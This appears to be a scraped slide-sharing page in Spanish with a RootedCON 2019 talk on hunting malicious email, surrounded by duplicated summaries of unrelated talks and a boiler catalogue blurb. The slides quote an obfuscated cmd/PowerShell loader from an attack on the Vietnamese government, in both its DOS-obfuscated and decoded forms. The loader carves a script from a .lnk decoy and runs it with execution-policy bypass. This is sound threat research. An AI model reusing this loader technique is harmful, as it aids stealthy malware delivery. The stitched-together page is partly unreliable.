El documento resume los resultados de análisis de correos electrónicos realizados durante 4 meses utilizando la plataforma Mail Mincer de ElevenPaths. Se destaca un ataque sofisticado dirigido al gobierno de Vietnam que utilizaba técnicas como AppLocker bypass, decoy files y carga de malware COBALT a través de .NET. El análisis también mostró que los correos electrónicos son un importante vector de entrada y que existen muchos correos accesibles públicamente que podrían usarse para extraer información de organizaciones.
LAS AMENAZAS INTERNAS Y SU IMPACTO EN SEGURIDAD DE DATOSCristian Garcia G.
La seguridad empresarial se enfoca en salvaguardar su información para evitar que los hackers penetren la red y accedan a los datos.
Aunque este es un buen comienzo, las organizaciones a menudo de manera ingenua pasan por alto los peligros de robo de datos iniciado por un empleado interno.
En la presentación mostrara las fallas comunes de seguridad internas y mostrara como mitigar y prevenir los riesgos de acceso a los datos de su compañía.
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
En esta plática analizaremos las amenazas a las que están expuestos los usuarios de Internet y organizaciones. Se demostrarán vulnerabilidades que afectan actualmente a diversos dispositivos. Además se presentarán estadísticas nunca antes publicadas sobre el estado actual de la seguridad del ecosistema de redes inalámbricas encontradas en México.
Ponente: Paulino Calderón. Consultor de seguridad informática y desarrollador de software. Es cofundador de Websec. Con experiencia en administración de servidores, diseño de software y auditorías de seguridad de aplicaciones web e infraestructuras de TI. Forma parte del equipo oficial de Nmap como desarrollador NSE. Es el autor de una de las aplicaciones más populares en México en la historia: Mac2wepkey HHG5XX.
Video: https://www.youtube.com/watch?v=V5ofjARl--4
LAS AMENAZAS INTERNAS Y SU IMPACTO EN SEGURIDAD DE DATOSCristian Garcia G.
La seguridad empresarial se enfoca en salvaguardar su información para evitar que los hackers penetren la red y accedan a los datos.
Aunque este es un buen comienzo, las organizaciones a menudo de manera ingenua pasan por alto los peligros de robo de datos iniciado por un empleado interno.
En la presentación mostrara las fallas comunes de seguridad internas y mostrara como mitigar y prevenir los riesgos de acceso a los datos de su compañía.
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
En esta plática analizaremos las amenazas a las que están expuestos los usuarios de Internet y organizaciones. Se demostrarán vulnerabilidades que afectan actualmente a diversos dispositivos. Además se presentarán estadísticas nunca antes publicadas sobre el estado actual de la seguridad del ecosistema de redes inalámbricas encontradas en México.
Ponente: Paulino Calderón. Consultor de seguridad informática y desarrollador de software. Es cofundador de Websec. Con experiencia en administración de servidores, diseño de software y auditorías de seguridad de aplicaciones web e infraestructuras de TI. Forma parte del equipo oficial de Nmap como desarrollador NSE. Es el autor de una de las aplicaciones más populares en México en la historia: Mac2wepkey HHG5XX.
Video: https://www.youtube.com/watch?v=V5ofjARl--4
Las campañas de phishing que utilizan como pretexto el interés que acapara el avance del COVID-19 se propagan cada vez con mayor frecuencia. Las mismas buscan no solo robar información personal de sus posibles víctimas, sino propagar noticias falsas y entregar publicidad no deseada a lo largo de todo el ataque.
Presentación que muestra como problemas de seguridad se aprovechan sitio s Web y se roban contraseñas. Se hace foco como desarrollar seguro. Como infraestructura resuelve problemas de desarrollo, como el WAF. El video de esta presentación disponible en https://www.youtube.com/watch?v=Jey0skoG0MU.
Presentación durante el XXIX Encuentro de Telecomunicaciones y Economía Digital a cargo de Pastora Valero, Directora General de Asuntos Públicos y Relaciones Institucionales para Europa Medio Oriente y África de CISCO Systems
SECCIÓN -- NO SOLO IT -- PAGINA 89
Reflexiones sobre el Miedo Profesional, reconocer las áreas de mejora o la adecuación sobre vida profesional y personal.
La privacidad de los datos y la seguridad cibernética son riesgos reales para las empresas.
Cómo las empresas responden a este tipo de incidentes puede dañar su reputación y confianza. Dado que las implicaciones son a menudo complejas, el procedimiento de toma decisiones para frenar los daños potenciales es a menudo difícil. La Dirección y Administración deben evaluar las iniciativas y decisiones desde el punto de vista ético.
Las campañas de phishing que utilizan como pretexto el interés que acapara el avance del COVID-19 se propagan cada vez con mayor frecuencia. Las mismas buscan no solo robar información personal de sus posibles víctimas, sino propagar noticias falsas y entregar publicidad no deseada a lo largo de todo el ataque.
Presentación que muestra como problemas de seguridad se aprovechan sitio s Web y se roban contraseñas. Se hace foco como desarrollar seguro. Como infraestructura resuelve problemas de desarrollo, como el WAF. El video de esta presentación disponible en https://www.youtube.com/watch?v=Jey0skoG0MU.
Presentación durante el XXIX Encuentro de Telecomunicaciones y Economía Digital a cargo de Pastora Valero, Directora General de Asuntos Públicos y Relaciones Institucionales para Europa Medio Oriente y África de CISCO Systems
SECCIÓN -- NO SOLO IT -- PAGINA 89
Reflexiones sobre el Miedo Profesional, reconocer las áreas de mejora o la adecuación sobre vida profesional y personal.
La privacidad de los datos y la seguridad cibernética son riesgos reales para las empresas.
Cómo las empresas responden a este tipo de incidentes puede dañar su reputación y confianza. Dado que las implicaciones son a menudo complejas, el procedimiento de toma decisiones para frenar los daños potenciales es a menudo difícil. La Dirección y Administración deben evaluar las iniciativas y decisiones desde el punto de vista ético.
Similar a Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019] (20)
Catalogo general Ariston Amado Salvador distribuidor oficial ValenciaAMADO SALVADOR
Distribuidor Oficial Ariston en Valencia: Amado Salvador distribuidor autorizado de Ariston, una marca líder en soluciones de calefacción y agua caliente sanitaria. Amado Salvador pone a tu disposición el catálogo completo de Ariston, encontrarás una amplia gama de productos diseñados para satisfacer las necesidades de hogares y empresas.
Calderas de condensación: Ofrecemos calderas de alta eficiencia energética que aprovechan al máximo el calor residual. Estas calderas Ariston son ideales para reducir el consumo de gas y minimizar las emisiones de CO2.
Bombas de calor: Las bombas de calor Ariston son una opción sostenible para la producción de agua caliente. Utilizan energía renovable del aire o el suelo para calentar el agua, lo que las convierte en una alternativa ecológica.
Termos eléctricos: Los termos eléctricos, como el modelo VELIS TECH DRY (sustito de los modelos Duo de Fleck), ofrecen diseño moderno y conectividad WIFI. Son ideales para hogares donde se necesita agua caliente de forma rápida y eficiente.
Aerotermia: Si buscas una solución aún más sostenible, considera la aerotermia. Esta tecnología extrae energía del aire exterior para calentar tu hogar y agua. Además, puede ser elegible para subvenciones locales.
Amado Salvador es el distribuidor oficial de Ariston en Valencia. Explora el catálogo y descubre cómo mejorar la comodidad y la eficiencia en tu hogar o negocio.
En este documento analizamos ciertos conceptos relacionados con la ficha 1 y 2. Y concluimos, dando el porque es importante desarrollar nuestras habilidades de pensamiento.
Sara Sofia Bedoya Montezuma.
9-1.
HPE presenta una competició destinada a estudiants, que busca fomentar habilitats tecnològiques i promoure la innovació en un entorn STEAM (Ciència, Tecnologia, Enginyeria, Arts i Matemàtiques). A través de diverses fases, els equips han de resoldre reptes mensuals basats en àrees com algorísmica, desenvolupament de programari, infraestructures tecnològiques, intel·ligència artificial i altres tecnologies. Els millors equips tenen l'oportunitat de desenvolupar un projecte més gran en una fase presencial final, on han de crear una solució concreta per a un conflicte real relacionat amb la sostenibilitat. Aquesta competició promou la inclusió, la sostenibilitat i l'accessibilitat tecnològica, alineant-se amb els Objectius de Desenvolupament Sostenible de l'ONU.
KAWARU CONSULTING presenta el projecte amb l'objectiu de permetre als ciutadans realitzar tràmits administratius de manera telemàtica, des de qualsevol lloc i dispositiu, amb seguretat jurídica. Aquesta plataforma redueix els desplaçaments físics i el temps invertit en tràmits, ja que es pot fer tot en línia. A més, proporciona evidències de la correcta realització dels tràmits, garantint-ne la validesa davant d'un jutge si cal. Inicialment concebuda per al Ministeri de Justícia, la plataforma s'ha expandit per adaptar-se a diverses organitzacions i països, oferint una solució flexible i fàcil de desplegar.
2. 2RootedCON 2019
¿Quienes somos?
Miguel Ángel de Castro
Senior Cyberthreats Analyst en ElevenPaths (Telefónica)
Pablo San Emeterio
Innovation Analyst & CSA ElevenPaths (Telefónica)
4. 4RootedCON 2019
Emails en Fuente abierta… fuga de datos….
From emails
To emails
Subjects
Adjuntos
Body:(passwords,contexto,
INFORMACIÓN….)
Etc…..
……
5. 5RootedCON 2019
---DISCLAIMER--- The contents of this E-mail (including the contents of the enclosure/(s) or attachment/(s)
if any) are privileged and confidential material of Mahindra and Mahindra Limited
and should not be disclosed to, used by or copied in any manner by anyone other than the intended
addressee/(s).
If this E-mail (including the enclosure/(s) or attachment/(s) if any ) has been received in error, please advise
the sender immediately and
delete it from your system. The views expressed in this E-mail message (including the enclosure/(s) or
attachment/(s) if any) are those of the individual sender.
Emails en Fuente abierta… fuga de datos…
8. 8RootedCON 2019
Malware Banco Pakistan
Description:
Adwind es un RAT basado en Java que se instala silenciosamente y se conecta a un
sitio remoto a través de un puerto preconfigurado para recibir comandos del
atacante remoto. Cuando está activo, es capaz de robar información de usuario y
también puede utilizarse para distribuir otro malware.
10. 10RootedCON 2019
MAIL MINCER: Arquitectura
PLATAFORMA DE HUNTING EN
SISTEMA DATA ANALITYC
PROCESAMIENTO
ML: DIARIO
SANDBOX: WILDFIRE
PALOALTO
AV: VIRUSTOTAL
Cabeceras
Adjuntos
Contenido
Etc…
• Tecnología interna.
• Permite analizar documentos ofimáticos y PDF
• Sin necesidad de subir el archivo completo.
Analiza protegiendo la privacidad.
• No utiliza tecnología antivirus, sino un sistema de
predicción propio basado en Machine Learning
• Permite para el analista bucear por los datos de
todos esos documentos, sin conocer su contenido
ni quién lo subió, solo los datos relevantes para
una investigación
17. 17RootedCON 2019
DIARIO
Quien esté interesado en acceder al panel o la API, que se
dirija a diario.e-paths.com y que escriba a labs@11paths.com
identificándose como RootedXEdition.
44. 45RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
DOS FUSCATION + FILE CARVING + FILESS POWERSHELL + AppLocker Bypass + Cobalt
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam
45. 46RootedCON 2019
184
142
207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
C:Windowssystem32cmd.exe /c findstring /b /i "iex"
C:UsersAdminDesktopattachment_toolTKCT quy I nam 2019.doc.lnk
powershell.exe bypass -file C:UsersAdminAppDataLocalTemps.ps1
DOS OFUSCATION DECODIFICADO
FILE CARVING
Ataque sofisticado al gobierno de Vietnam
46. 47RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
Ataque sofisticado al gobierno de Vietnam
47. 48RootedCON 2019
184
142 207
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam
57. 58RootedCON 2019
184
142 207
• EL EMAIL ES UNO DE LOS PRINCIPALES VECTORES DE ENTRADA A UNA ORGANIZACIÓN, LOS CONTROLES
PREVIOS NO SON SUFICIENTEMENTE EFECTIVOS.
• EXISTEN MUCHOS CORREOS ACCESIBLES EN FUENTE ABIERTA ACCESIBLES PARA CUALQUIERA, ESTO
PERMITEACCEDER A INFORMACIÓN SENSIBLE DE UNA ORGANIZACIÓN Y REALIZAR PERFILADO DE LA MISMA.
• LA VARIEDAD DE MALWARE ENCONTRADO ES AMPLIA, CON MUCHA PRESENCIA DE EMOTET
• LAS TÉCNICAS MAS INTERESANTES ENCONTRADAS PARA EVITAR LA DETECCIÓN POR AV, SANDBOX O ML
SON:
• ADJUNTOS COMPRIMIDOS CON UNA PASSWORD PRESENTE EN EL PROPIO EMAIL
• FILESS MEDIANTE POWERSHELL
• DOS-FUSCATION
• EXPLOITS EN DOCUMENTOS OFIMÁTICOS Y PDF
• APPLOCKER BYPASS
• LOS ATACANTES DEDICAN MÁS ESFUERZO AL DESPLIEGUE DEL MALWARE PARA NO SER DETECTADOS QUE
AL DESARROLLO DE NUEVAS PIEZAS DE MALWARE´
Analisis .gov